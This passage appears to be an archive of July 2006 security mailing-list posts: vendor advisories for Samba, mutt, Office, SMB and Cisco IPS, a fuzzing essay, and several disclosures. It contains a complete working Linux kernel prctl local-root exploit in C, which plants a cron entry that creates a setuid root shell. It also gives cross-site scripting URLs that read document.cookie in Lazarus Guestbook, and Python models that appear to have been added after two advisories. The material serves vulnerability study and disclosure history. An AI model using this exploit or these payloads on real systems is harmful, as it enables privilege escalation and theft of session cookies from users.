 4740a0c21ac308c552611a5ee347c72a  x86_64/10.2/RPMS/samba-client-3.0.13-2.1.102mdk.x86_64.rpm
 6115c746181eaeb5c0d1d507c116a6db  x86_64/10.2/RPMS/samba-common-3.0.13-2.1.102mdk.x86_64.rpm
 ff054b178cff6c783fc730ca9c6ada5f  x86_64/10.2/RPMS/samba-doc-3.0.13-2.1.102mdk.x86_64.rpm
 c6e65bf57165bdc7f438e92ec9bd7823  x86_64/10.2/RPMS/samba-passdb-mysql-3.0.13-2.1.102mdk.x86_64.rpm
 abf978ba0e1a53d0bc7c9938787d57f5  x86_64/10.2/RPMS/samba-passdb-pgsql-3.0.13-2.1.102mdk.x86_64.rpm
 8d3dcc5cfd15c7401bd0c1835b2ede77  x86_64/10.2/RPMS/samba-passdb-xml-3.0.13-2.1.102mdk.x86_64.rpm
 47c818ab47d1a18e3fe2bdc44d7c3916  x86_64/10.2/RPMS/samba-server-3.0.13-2.1.102mdk.x86_64.rpm
 0d64c5d745416788db5c1e879f04ae03  x86_64/10.2/RPMS/samba-smbldap-tools-3.0.13-2.1.102mdk.x86_64.rpm
 fb96a98a1ec0fa08001e0ecb155bb243  x86_64/10.2/RPMS/samba-swat-3.0.13-2.1.102mdk.x86_64.rpm
 06d7c44374d9ba8cde7077da3d6908c7  x86_64/10.2/RPMS/samba-vscan-clamav-3.0.13-2.1.102mdk.x86_64.rpm
 d7349d986a8b2b602c2c74d405571c27  x86_64/10.2/RPMS/samba-vscan-icap-3.0.13-2.1.102mdk.x86_64.rpm
 a7b8792e6ee53529f84dbb2c42431396  x86_64/10.2/RPMS/samba-winbind-3.0.13-2.1.102mdk.x86_64.rpm
 3cfae3f4e389c05b161fc03447fe8ea1  x86_64/10.2/SRPMS/samba-3.0.13-2.1.102mdk.src.rpm

 Mandriva Linux 2006.0:
 b639e531c8aa76a45bb4fd7fc0c9d08f  2006.0/RPMS/libsmbclient0-3.0.20-3.1.20060mdk.i586.rpm
 21d7c1bcdae8ba923815557a265aed8c  2006.0/RPMS/libsm
Lazarus Guestbook Cross Site Scripting Vulnerabilities
Product : Lazarus Guestbook
Website : http://carbonize.co.uk/Lazarus/
Version : <= 1.6
Problem : Cross Site Scripting

1) The first problem is in codes-english.php: the "show" parameter in lang/codes-english.php isn't properly sanitised. This can be exploited to execute arbitrary HTML and JavaScript code.

Vulnerable code in lang/codes-english.php near line 4: 1 2 3 4

Exploit :
http://localhost/lazarusgb/lang/codes-english.php?show=%3C/title%3E[XSS]
http://localhost/lazarusgb/lang/codes-english.php?show=%3C/title%3Ealert(document.cookie);

2) The second problem is in picture.php: the script first verifies that the image file exists, then displays it. Vulnerable code in picture.php:

24 if (!empty($_GET['img'])) {
26     if (file_exists("$GB_TMP/$_GET[img]")) {
27         $size = @GetImageSize("$GB_TMP/$_GET[img]");
28         $picture = "$GB_PG[base_url]/$GB_TMP/$_GET[img]";
29     }
..
49
50 \n";
53 }
54 ?>
55

If magic_quotes_gpc = OFF we can bypass this protection by specifying an existing image file (example: "img/home.gif") and using a null char (%00).

PoC :
http://localhost/lazarusgb/picture.php?img=../img/home.gif%00[code]

file_exists("$GB_TMP/$_GET[img]") will return true and the HTML code will be executed.

Exploit:
http://localhost/lazarusgb/picture.php?img=../img/home.gif%00%22%3E[XSS]
http://localhost/lazarusgb/picture.php?img=../img/home.gif%00%22%3Ealert(document.cookie);

Contact : simo64[at]gmail[dot]com
Moroccan Security Research Team
RE: Old vulnerable software collection
Older versions of various freely distributable programs can be found at OldVersion.com (http://www.oldversion.com/).

--
John Rigali
Information Technology Coordinator
Verbum Dei High School
http://www.verbumdeihs.com/
Working in the Jesuit Tradition

-----Original Message-----
From: Jerome Athias [mailto:[EMAIL PROTECTED]
Sent: Monday, July 10, 2006 12:40 AM
To: bugtraq@securityfocus.com
Subject: Old vulnerable software collection

Hi,

it's often difficult to find old versions of vulnerable software.
It's useful to have these old versions to test an exploit, study a vulnerability or do a patch analysis... it's also useful to test a fuzzer, a scanner... for a course or a challenge...
So I am thinking about building a little repository with old versions of small programs (free or trial).
If you are interested or could help, please visit this page:
https://www.securinfos.info/old_softwares_vulnerable.php

Cheers
/JA
Re: Browser bugs hit IE, Firefox today (SANS)
On 7/4/06, Thor Larholm <[EMAIL PROTECTED]> wrote:
> However, reading the contentDocument property of the DOM element instead of going through the frames collection will give you a reference to the document object inside the third-party domain and even allow you to overwrite native DOM methods without throwing a security exception, such as
> document.getElementById("thirdparty").contentDocument.getElementById=function(s){alert(s)}.

This code throws an exception in Firefox 1.5.0.4:

Error: uncaught exception: Permission denied to set property HTMLDocument.getElementById

Just obtaining a reference to the contentDocument works, but any action on it throws an error.
S21Sec-032-en: Vulnerability in Fatwire Content Server
########################################
          - S21Sec Advisory -
########################################

Title:     FatWire Content Server
ID:        S21SEC-032-en
Severity:  High - Administrative Privileges Escalation
History:   31.May.2006 Vulnerability discovered
           05.Jun.2006 Fixed (patch available)
Scope:     FatWire Content Server Portal
Platforms: Any
Author:    Alberto Moro ([EMAIL PROTECTED])
URL:       http://www.s21sec.com/avisos/s21sec-032-en.txt
Release:   Public

[ SUMMARY ]

The FatWire Content Server product suite enables companies to deploy a wide variety and large quantity of Web sites and content-centric applications that build customer loyalty, reach new markets, strengthen brand identity, boost productivity, and reduce costs.

[ AFFECTED VERSIONS ]

The following tested versions are affected by this issue:

- FatWire Content Server 5.5.0

[ DESCRIPTION ]

It is possible to obtain administrative privileges in the portal without prior registration or validation.

[ WORKAROUND ]

Upgrade FatWire CS to the latest version or apply the patch provided by the vendor.

[ ACKNOWLEDGMENTS ]

These vulnerabilities have been found and researched by:

- Alberto Moro <[EMAIL PROTECTED]> S21Sec

With thanks to:

- Leonardo Nve <[EMAIL PROTECTED]> S21Sec

[ REFERENCES ]

* FatWire Content Server
  http://www.fatwire.com/cs/Satellite/CSPage_US.html

* S21Sec
  http://www.s21sec.com
TOPo v.2.2.178 Account Reset
TOPo v.2.2.178 Account Reset

Author: Attila Gerendi (Darkz)
Date: July 12, 2006
Package: TOPo (http://ej3soft.ej3.net/)
Versions Affected: 2.2.178 (Other versions may also be affected.)
Severity: Password Reset

Description:
It is possible to override an existing entry by posting a new entry with a previous entry's ID. The ID can be extracted from the main window links, e.g.:
http://[host]/[path]/index.php?m=top&s=out&ID=1152699749.6695
The new entry will override the original entry, and it will also override the original password.

Another problem is the ID format xx. where  is the original (initial) password.

Solution:
TOPo development seems to be suspended by now. No new release since January 5, 2005.
[SECURITY] [DSA 1108-1] New mutt packages fix arbitrary code execution
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1108-1                      [EMAIL PROTECTED]
http://www.debian.org/security/                           Moritz Muehlenhoff
Jul 11th, 2006                           http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : mutt
Vulnerability  : buffer overflow
Problem-Type   : remote
Debian-specific: no
CVE ID         : CVE-2006-3242
Debian Bug     : 375828

It was discovered that the mutt mail reader performs insufficient validation of values returned from an IMAP server, which might overflow a buffer and potentially lead to the injection of arbitrary code.

For the stable distribution (sarge) this problem has been fixed in version 1.5.9-2sarge2.

For the unstable distribution (sid) this problem has been fixed in version 1.5.11+cvs20060403-2.

We recommend that you upgrade your mutt package.

Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian GNU/Linux 3.1 alias sarge
- --------------------------------

Source archives:

  http://security.debian.org/pool/updates/main/m/mutt/mutt_1.5.9-2sarge2.dsc
    Size/MD5 checksum:     775 6dded70d1b853282f90168f83a3da833
  http://security.debian.org/pool/updates/main/m/mutt/mutt_1.5.9-2sarge2.diff.gz
    Size/MD5 checksum:   94233 7c72a620b8772515556b986bfb93b0fb
  http://security.debian.org/pool/updates/main/m/mutt/mutt_1.5.9.orig.tar.gz
    Size/MD5 checksum: 3033253 587dd1d8f44361b73b82ef64eb30c3a0

Alpha architecture:

  http://security.debian.org/pool/updates/main/m/mutt/mutt_1.5.9-2sarge2_alpha.deb
    Size/MD5 checksum: 1530480 f93c6b6e3d599a00d8927cc67c1ce691

AMD64 architecture:

  http://security.debian.org/pool/updates/main/m/mutt/mutt_1.5.9-2sarge2_amd64.deb
    Size/MD5 checksum: 1442518 aeb593803115ca292f2112fbf44106fc

ARM architecture:

  http://security.debian.org/pool/updates/main/m/mutt/mutt_1.5.9-2sarge2_arm.deb
    Size/MD5 checksum: 1420526 569e402f7715c2116d0445dedd8a419f

Intel IA-32 architecture:

  http://security.debian.org/pool/updates/main/m/mutt/mutt_1.5.9-2sarge2_i386.deb
    Size/MD5 checksum: 1416838 e38785e2498fca52d8a7bbefae26fa94

Intel IA-64 architecture:

  http://security.debian.org/pool/updates/main/m/mutt/mutt_1.5.9-2sarge2_ia64.deb
    Size/MD5 checksum: 1626542 2aa9e0061439f25598ce205ef680acc1

HP Precision architecture:

  http://security.debian.org/pool/updates/main/m/mutt/mutt_1.5.9-2sarge2_hppa.deb
    Size/MD5 checksum: 1467244 5731fe300b59d268423108e5073c29ac

Motorola 680x0 architecture:

  http://security.debian.org/pool/updates/main/m/mutt/mutt_1.5.9-2sarge2_m68k.deb
    Size/MD5 checksum: 1370346 a9acf01e90144e69d06f5ab94984e3fa

Big endian MIPS architecture:

  http://security.debian.org/pool/updates/main/m/mutt/mutt_1.5.9-2sarge2_mips.deb
    Size/MD5 checksum: 1474126 ed6c9bd33b9f3173dac03c9bc8da120a

Little endian MIPS architecture:

  http://security.debian.org/pool/updates/main/m/mutt/mutt_1.5.9-2sarge2_mipsel.deb
    Size/MD5 checksum: 1472642 b1693682bf38da32054e638c37b6ab56

PowerPC architecture:

  http://security.debian.org/pool/updates/main/m/mutt/mutt_1.5.9-2sarge2_powerpc.deb
    Size/MD5 checksum: 1446202 6226966d71933436a2909dfc9a9c57a8

IBM S/390 architecture:

  http://security.debian.org/pool/updates/main/m/mutt/mutt_1.5.9-2sarge2_s390.deb
    Size/MD5 checksum: 1444064 50bcd604cf4ebe69d4bd4e11c44cdb88

Sun Sparc architecture:

  http://security.debian.org/pool/updates/main/m/mutt/mutt_1.5.9-2sarge2_sparc.deb
    Size/MD5 checksum: 1417006 056963151226667c293f13c4b8a2db88

These files will probably be moved into the stable distribution on its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3 (GNU/Linux)

iD8DBQFEstAcXm3vHE4uyloRAoyjAKDJ0AHvdlXXjNl+FUq5VFzk/ZCM8wCfZ/Tr
wOSRNhC+EzSkLuBEMiZmlXc=
=akN4
-----END PGP SIGNATURE-----
Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t Exploit ( BID 18874 / CVE-2006-2451 )
Maybe this is obvious for Paul Starzetz (as well as many other people) but full-disclosure is not really "full" without exploit code. Working exploit attached. You can also download it from: http://www.rs-labs.com/exploitsntools/rs_prctl_kernel.c

Greetz to !dSR ppl :-)

--
Saludos,
-Roman

PGP Fingerprint: 09BB EFCD 21ED 4E79 25FB 29E1 E47F 8A7D EAD5 6742
[Key ID: 0xEAD56742. Available at KeyServ]

/*************************************************************/
/* Local r00t Exploit for:                                   */
/* Linux Kernel PRCTL Core Dump Handling                     */
/* ( BID 18874 / CVE-2006-2451 )                             */
/* Kernel 2.6.x (>= 2.6.13 && < 2.6.17.4)                    */
/* By:                                                       */
/*  - dreyer <[EMAIL PROTECTED]> (main PoC code)             */
/*  - RoMaNSoFt <[EMAIL PROTECTED]> (local root code)        */
/* [ 10.Jul.2006 ]                                           */
/*************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <sys/prctl.h>

/* Crontab text kept in a global so that it is part of the child's core image,
 * which the kernel writes into the child's current directory (/etc/cron.d). */
char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core\n";

int main()
{
    int child;
    struct rlimit corelimit;

    printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n");
    printf("By: dreyer & RoMaNSoFt\n");
    printf("[ 10.Jul.2006 ]\n\n");

    /* Lift the core size limit so a core file is actually produced */
    corelimit.rlim_cur = RLIM_INFINITY;
    corelimit.rlim_max = RLIM_INFINITY;
    setrlimit(RLIMIT_CORE, &corelimit);

    printf("[*] Creating Cron entry\n");

    if ( !( child = fork() )) {
        /* Child: move into /etc/cron.d, set the dumpable mode the bug
         * concerns, then wait to be killed */
        chdir("/etc/cron.d");
        prctl(PR_SET_DUMPABLE, 2);
        sleep(200);
        exit(1);
    }

    /* Parent: force the child to dump core */
    kill(child, SIGSEGV);

    printf("[*] Sleeping for aprox. one minute (** please wait **)\n");
    sleep(62);

    printf("[*] Running shell (remember to remove /tmp/sh when finished) ...\n");
    system("/tmp/sh -i");

    return 0;
}
NSFOCUS SA2006-04 : Microsoft Office GIF Filter Buffer Overflow Vulnerability
NSFOCUS Security Advisory (SA2006-04)

Microsoft Office GIF Filter Buffer Overflow Vulnerability

Release Date: 2006-07-12
CVE ID: CVE-2006-0007
http://www.nsfocus.com/english/homepage/research/0604.htm

Affected systems & software

Microsoft Office 2000
Microsoft Office XP
Microsoft Office 2003

Unaffected systems & software

Summary

NSFocus Security Team discovered a buffer overflow vulnerability in the Microsoft Office GIF filter, which could allow attackers to run arbitrary code via a carefully crafted GIF image.

Description

GIFIMP32.FLT is a GIF image filter shipped with Microsoft Office, which is installed by default in %CommonProgramFiles%\Microsoft Shared\Grphflt\GIFIMP32.FLT. GIFIMP32.FLT contains a buffer overflow vulnerability in the handling of some malformed GIF images, which allows attackers to run arbitrary code.

Any application that calls GIFIMP32.FLT is affected by this vulnerability. For example, mspaint.exe will call the filter automatically when opening files in .gif format, if Microsoft Office is installed.

Attackers could gain control over a system by luring users to open a malicious GIF image.

Workaround

1. Do not open any GIF image from untrusted sources.
2. Temporarily remove GIFIMP32.FLT.

Vendor Status

2005.05.27 Informed the vendor
2005.06.02 Vendor confirmed the vulnerability
2006.07.11 Microsoft has released a security bulletin (MS06-039) and related patches. For more details about the security bulletin, please refer to: http://www.microsoft.com/technet/security/bulletin/MS06-039.mspx

Additional Information

The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2006-0007 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. Candidates may change significantly before they become official CVE entries.

Acknowledgment

Yu Yang of NSFocus Security Team found the vulnerability.

DISCLAIMS

THE INFORMATION PROVIDED IS RELEASED BY NSFOCUS "AS IS" WITHOUT WARRANTY OF ANY KIND. NSFOCUS DISCLAIMS ALL WARRANTIES, EITHER EXPRESSED OR IMPLIED, EXCEPT FOR THE WARRANTIES OF MERCHANTABILITY. IN NO EVENT SHALL NSFOCUS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF NSFOCUS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. DISTRIBUTION OR REPRODUCTION OF THE INFORMATION IS PROVIDED THAT THE ADVISORY IS NOT MODIFIED IN ANY WAY.

Copyright 1999-2006 NSFOCUS. All Rights Reserved. Terms of use.

NSFOCUS Security Team <[EMAIL PROTECTED]>
NSFOCUS INFORMATION TECHNOLOGY CO.,LTD (http://www.nsfocus.com)
PGP Key: http://www.nsfocus.com/homepage/research/pgpkey.asc
Key fingerprint = F8F2 F5D1 EF74 E08C 02FE 1B90 D7BF 7877 C6A6 F6DA
[ MDKSA-2006:117-1 ] - Updated libmms packages fix buffer overflow vulnerability
Mandriva Linux Security Advisory MDKSA-2006:117-1
http://www.mandriva.com/security/

Package : libmms
Date: July 12, 2006
Affected: 2006.0

Problem Description:

Stack-based buffer overflow in MiMMS 0.0.9 allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via the (1) send_command, (2) string_utf16, (3) get_data, and (4) get_media_packet functions, and possibly other functions. Libmms uses the same vulnerable code.

Update:

The previous update for libmms had an incorrect/incomplete patch. This update includes a more complete fix for the issue.

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2200

Updated Packages:

Mandriva Linux 2006.0:

Mandriva Linux 2006.0/X86_64:

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security.
You can obtain the GPG public key of the Mandriva Security Team by executing:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact security_(at)_mandriva.com

Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
Microsoft Excel Array Index Error Remote Code Execution
Microsoft Excel Array Index Error Remote Code Execution

By Sowhat of Nevis Labs
2006.07.11
http://www.nevisnetworks.com
http://secway.org/advisory/AD20060711.txt

Vendor: Microsoft Inc.

Products affected:
Microsoft Office 2000 Service Pack 3
Microsoft Office XP Service Pack 3
Microsoft Office 2003 Service Pack 1 or Service Pack 2
maybe some others

Remote: YES
Exploitable: YES
CVE: CVE-2006-1306

Overview:

This vulnerability allows remote attackers to execute arbitrary code in the context of the logged-in user. An array boundary condition may be violated by a malicious .xls file in order to redirect execution into attacker-supplied data. Exploitation requires that the attacker coerce or persuade the victim to open a malicious .XLS file.

Details:

The specific flaw exists within the parsing of the BIFF file format used by Microsoft Excel. A function pointer is not validated and is insecurely affected by some user-supplied data, thus resulting in code execution.

The disassembly code:

.text:300ABAFC sub_300ABAFC    proc near               ; CODE XREF: sub_3008FEA4+B5p
.text:300ABAFC                                         ; sub_30096EC8-5F2p ...
.text:300ABAFC
.text:300ABAFC arg_0           = dword ptr  4
.text:300ABAFC arg_4           = dword ptr  8
.text:300ABAFC arg_8           = dword ptr  0Ch
.text:300ABAFC
.text:300ABAFC                 mov     eax, [esp+arg_0]
.text:300ABB00                 movsx   ecx, word ptr [eax]    --> [eax] read from the XLS file
.text:300ABB03                 push    [esp+arg_8]
.text:300ABB07                 imul    ecx, 14h
.text:300ABB0A                 push    [esp+4+arg_4]
.text:300ABB0E                 push    eax
.text:300ABB0F                 mov     eax, dword_308792C4    --> [eax]=00e17638, always, maybe different in the language SYSTEM
.text:300ABB14                 call    dword ptr [ecx+eax]    --> Here! call your CODE.
.text:300ABB17                 retn    0Ch
.text:300ABB17 sub_300ABAFC    endp

eax is the index and always set to 00e17638h(?), and the ecx can vary over a very wide range, so we, the attacker, can plant specific data somewhere and CALL it. The supplied data is used in some operation and, after some calculation (such as imul), is used for direct memory access; in this case we can calculate and specially choose a value that points to data we control, which easily leads to remote code execution.

POC:

No POC will be supplied

Fix:

Microsoft has released an update for Microsoft Office which is set to address this issue. This can be downloaded from:
http://www.microsoft.com/technet/security/bulletin/MS06-037.mspx

Vendor Response:

2006.05.30 Vendor notified via [EMAIL PROTECTED]
2006.05.30 Vendor responded
2006.07.11 Vendor released MS06-037 patch
2006.07.11 Advisory released

Common Vulnerabilities and Exposures (CVE) Information:

The Common Vulnerabilities and Exposures (CVE) project has assigned the following names to these issues. These are candidates for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems.

CVE-2006-1306

Reference:

1. http://sc.openoffice.org/excelfileformat.pdf
2. http://www.microsoft.com/technet/security/Bulletin/MS06-037.mspx
3. http://www.microsoft.com/technet/security/Bulletin/MS06-012.mspx
4. http://www.eeye.com/html/research/advisories/AD20051104.html

Greetings to [EMAIL PROTECTED] :)

--
Sowhat
http://secway.org
"Life is like a bug, Do you know how to exploit it ?"
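The dispatch the disassembly shows, as an added Python model that is not the advisory's code: the record's first 16-bit word is sign-extended as movsx does, scaled by 0x14 and added to the table base loaded from dword_308792C4, with nothing checking that the result stays inside the handler table; the hardened variant applies that check. TABLE_ENTRIES and the sample record words are constructed for the example.

```python
import struct

# Values quoted in the advisory's disassembly
ENTRY_STRIDE = 0x14          # imul ecx, 14h: every table entry is 20 bytes
TABLE_BASE = 0x00E17638      # dword_308792C4 as observed by the advisory's author
TABLE_ENTRIES = 64           # constructed: assumed number of legitimate handlers


class BadIndexError(ValueError):
    """Raised by the hardened dispatcher when the record index leaves the table."""


def read_index(record):
    """movsx ecx, word ptr [eax]: the record's first 16-bit word, sign-extended."""
    return struct.unpack_from("<h", record, 0)[0]


def call_target_unchecked(record):
    """Vulnerable form: call dword ptr [ecx+eax] with ecx taken straight from the file.

    Returns the address the function pointer would be loaded from. Nothing
    constrains it to the table, so a 16-bit index reaches 20 * index bytes
    before (negative index) or after (large index) TABLE_BASE."""
    idx = read_index(record)
    return (TABLE_BASE + idx * ENTRY_STRIDE) & 0xFFFFFFFF


def call_target_checked(record):
    """Hardened form: reject indices outside [0, TABLE_ENTRIES) before indexing."""
    idx = read_index(record)
    if not 0 <= idx < TABLE_ENTRIES:
        raise BadIndexError("record index %d outside handler table" % idx)
    return TABLE_BASE + idx * ENTRY_STRIDE


def in_table(addr):
    """True when addr lies inside the legitimate function-pointer table."""
    return TABLE_BASE <= addr < TABLE_BASE + TABLE_ENTRIES * ENTRY_STRIDE


def is_rejected(record):
    """True when the hardened dispatcher refuses the record."""
    try:
        call_target_checked(record)
    except BadIndexError:
        return True
    return False


if __name__ == "__main__":
    # Constructed record words: a valid index, the largest positive index, and 0xFFFF (-1)
    for word in (b"\x03\x00", b"\xff\x7f", b"\xff\xff"):
        addr = call_target_unchecked(word)
        print("index %6d -> pointer read from 0x%08x, inside table: %s, hardened rejects: %s"
              % (read_index(word), addr, in_table(addr), is_rejected(word)))
```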
SMB Information Disclosure Vulnerability
McAfee, Inc.
McAfee® Avert® Labs Security Advisory

Public Release Date: 2006-07-11

SMB Information Disclosure Vulnerability
CVE-2006-1315

Synopsis

An information disclosure vulnerability exists in the Server service that could allow an attacker to retrieve fragments of memory from an affected host via the host's SMB server.

Vulnerable System or Application

Microsoft Windows 2000
Microsoft Windows XP w/ Service Pack 1
Microsoft Windows XP w/ Service Pack 2
Microsoft Windows Server 2003
Microsoft Windows Server 2003 w/ Service Pack 1

Vulnerability Information

This issue is caused by the Server protocol driver's failure to zero out memory before reusing it when constructing SMB response messages. An attacker could exploit this vulnerability by sending a specially crafted request that, when processed, would result in a response packet being sent that unintentionally contained portions of memory from the target host.

Note that this vulnerability would not allow an attacker to execute code or to elevate their user rights directly. It could be used to produce useful information to try to further compromise the affected system.

Resolution

Microsoft has released a security bulletin and associated patch for this vulnerability:
http://www.microsoft.com/technet/security/Bulletin/MS06-035.mspx

Credits

This vulnerability was discovered by Mike Price and Rafal Wojtczuk of McAfee Avert Labs.

Legal Notice

Copyright (C) 2006 McAfee, Inc. The information contained within this advisory is provided for the convenience of McAfee's customers, and may be redistributed provided that no fee is charged for distribution and that the advisory is not modified in any way. McAfee makes no representations or warranties regarding the accuracy of the information referenced in this document, or the suitability of that information for your purposes.

McAfee, Inc. and McAfee Avert Labs are registered Trademarks of McAfee, Inc. and/or its affiliated companies in the United States and/or other Countries. All other registered and unregistered trademarks in this document are the sole property of their respective owners.
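The defect class the advisory describes, modelled in added Python that is not Windows or Samba code: a response buffer reused across replies without being zeroed, so a request whose declared frame is longer than the data the server actually fills in carries the previous reply's bytes out; the fixed builder clears the frame first. Buffer size, payloads and frame length are constructed.

```python
class ResponseBuffer:
    """Constructed model of one pool block reused for successive SMB responses."""

    def __init__(self, size=64):
        self.mem = bytearray(size)   # reused for every reply, never freed in between

    def _check(self, payload, frame_len):
        if frame_len > len(self.mem):
            raise ValueError("frame exceeds buffer")
        if len(payload) > frame_len:
            raise ValueError("payload exceeds declared frame")

    def build_insecure(self, payload, frame_len):
        """Vulnerable: copy payload, emit frame_len bytes, never clear the rest.

        Whatever the previous response left between len(payload) and
        frame_len goes out on the wire."""
        self._check(payload, frame_len)
        self.mem[:len(payload)] = payload
        return bytes(self.mem[:frame_len])

    def build_secure(self, payload, frame_len):
        """Fixed: zero the whole frame region before the payload is copied in."""
        self._check(payload, frame_len)
        self.mem[:frame_len] = bytes(frame_len)
        self.mem[:len(payload)] = payload
        return bytes(self.mem[:frame_len])


def trailing_bytes(frame, payload):
    """The part of a response frame beyond what the server meant to send."""
    return frame[len(payload):]


def demo(secure):
    """Answer a normal request, then a crafted one whose declared frame length
    exceeds the data the server fills in; return the second reply's trailing bytes."""
    buf = ResponseBuffer(64)
    build = buf.build_secure if secure else buf.build_insecure
    earlier = b"earlier reply: user=alice session=0x1234 share=FINANCE"  # constructed
    build(earlier, len(earlier))
    short = b"ok"
    frame = build(short, 40)       # crafted: 40-byte frame, only 2 bytes of real data
    return trailing_bytes(frame, short)


if __name__ == "__main__":
    print("insecure builder leaks:", demo(secure=False))
    print("secure builder leaks:  ", demo(secure=True))
```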
Fuzzing Microsoft Office
Last Friday I posted a POC regarding the Microsoft Office mso.dll boundary condition error. I have checked the code flow of mso_203 and it was producing access violation errors, which I sent to bugtraq and FD. Microsoft's MSRC blog has been updated at http://blogs.technet.com/msrc/archive/2006/07/10/441006.aspx stating that the vulnerability is not remotely exploitable, which is true. However, while checking a bunch of fuzzed documents, several other problems have been noticed, and other people have reported issues with different Office applications. Some of them were able to reproduce the issue, and they are exploitable; others may not be.

Microsoft Office vulnerabilities are not new, but recently interest has increased. It has been noticed that people fuzz the documents and afterwards don't know which type of error it is or whether the vulnerability is exploitable or not!! Just note how many 0-days have been reported in the past few months in MS Office products. It is interesting to see that most of these vulnerabilities are directly or indirectly related to fuzzing and/or changing the normal behavior of documents.

If we take the example of the recently discovered HLINK.DLL buffer overflow flaw, kcope, who reported it, used Perl's Excel worksheet generator to generate a long URL string in the worksheet. Interestingly, Microsoft Office does not allow you to generate hyperlinks with such long strings (usually restricted to 256 bytes); even OLE automation restricts you, but Microsoft's binary file format does not have such restrictions for "hyperlink" objects. Maybe it was assumed that the library is safe since Office does not allow users to have such nasty URLs.

The problem of generating the specially crafted files is not a big issue. It was assumed that one should know the binary file format in order to generate some "valid document" (one which is parsable by the applications), but the Perl library is just an example: nanika posted another style sheet flaw in MS Excel which looks like the result of an exercise with the same library. A few days back the same exploit was released for MS Word. It is also interesting that 3rd-party libraries are not that restrictive when producing MS Office compatible files; they allow you to do some really funny stuff. For example, it is an open question why OpenOffice developers decided to accept a URL string of, say, 20,000 bytes (perhaps of indefinite length)?? One can easily identify some new problems while experimenting with this stuff.

- Naveed Afzal
rPSA-2006-0128-1 samba samba-swat
rPath Security Advisory: 2006-0128-1
Published: 2006-07-11
Products: rPath Linux 1
Rating: Major
Exposure Level Classification: Remote Deterministic Denial of Service

Updated Versions:
samba=/[EMAIL PROTECTED]:devel//1/3.0.23-1-0.1
samba-swat=/[EMAIL PROTECTED]:devel//1/3.0.23-1-0.1

References:
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3403
https://issues.rpath.com/browse/RPL-496

Description:
In previous versions of the samba package, a remote attacker can cause samba to consume all system memory, leading to a denial of service.
Cisco Security Advisory: Cisco Intrusion Prevention System Malformed Packet Denial of Service
Cisco Security Advisory: Cisco Intrusion Prevention System Malformed Packet Denial of Service

Advisory ID: cisco-sa-20060712-ips
http://www.cisco.com/warp/public/707/cisco-sa-20060712-ips.shtml
Revision 1.0
For Public Release 2006 July 12 1600 UTC (GMT)

Contents

Summary
Affected Products
Details
Impact
Software Version and Fixes
Workarounds
Obtaining Fixed Software
Exploitation and Public Announcements
Status of this Notice: FINAL
Distribution
Revision History
Cisco Security Procedures

Summary

Cisco Intrusion Prevention System (IPS) software version 5.1 is vulnerable to a denial of service condition caused by a malformed packet, which may result in an IPS device becoming inaccessible remotely or via the console and failing to process packets. A power reset is required to recover the IPS device.

There are no workarounds for this vulnerability.

Cisco has made free software available to address this vulnerability for affected customers.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20060712-ips.shtml

Affected Products

Vulnerable Products

Cisco Intrusion Prevention System 42xx appliances running IPS software versions 5.1(1), 5.1(1a), 5.1(1b), 5.1(1c), 5.1(1d), 5.1(1e) or 5.1(p1). IPS software versions 5.1(1a), 5.1(1b), 5.1(1c), 5.1(1d) and 5.1(1e) are repackaged versions of 5.1(1) created to fix various installation problems. All 5.1(1) patch versions report 5.1(1) as the installed version.

Note: Some IDS/IPS appliances shipped before IPS software version 5.0 was available and have model numbers starting with IDS, not IPS.

The following 42xx appliances are potentially affected.

* IDS-4235
* IPS-4240
* IDS-4250-SX
* IDS-4250-TX
* IDS-4250-XL (4250 with XL accelerator card)
* IPS-4255

Products Confirmed Not Vulnerable

All devices running Cisco Intrusion Detection Systems (IDS) software versions 4.x or IPS versions 5.0(x).

Additionally, the following devices are not vulnerable even if running IPS software versions 5.1(1), 5.1(1a), 5.1(1b), 5.1(1c), 5.1(1d), 5.1(1e) or 5.1(1p1).

* NM-CIDS
* IDSM-2
* ASA-SSM-AIP-10
* ASA-SSM-AIP-20
* IDS-4210
* IDS-4215

The following devices do not support IPS software version 5.1 and are not vulnerable.

* IDS-4220
* IDS-4230

To determine the version of software running on an IPS device, log into the IPS device using an SSH client and issue the command show version.

sensor#show version
Application Partition:
